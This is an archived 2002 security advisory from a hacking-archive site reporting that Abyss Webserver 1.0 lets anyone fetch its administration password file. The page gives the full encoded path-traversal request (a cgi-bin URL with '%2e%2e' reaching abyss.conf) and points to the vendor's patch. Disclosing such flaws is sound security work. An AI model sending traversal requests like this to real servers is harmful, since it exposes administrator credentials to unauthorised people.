AOH :: Web :: Servers :: WEB5256.HTM

AOH :: Web :: Servers :: WEB5256.HTM
Abyss httpd 1.0 administration password file retrieval

11th Apr 2002 [SBWID-5256]

COMMAND

	Abyss httpd administration password file retrieval

SYSTEMS AFFECTED

	Abyss Webserver 1.0

PROBLEM

	In NETCRA$H SECURITY REPORT [http://www26.brinkster.com/netcrash/] :
	

	Request to get the password file just by breaking WWWROOT using  Unicode
	:
	

	http://127.0.0.1/cgi-bin/%2e%2e/abyss.conf

	

	

SOLUTION

	See http://www.aprelium.com for patch.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.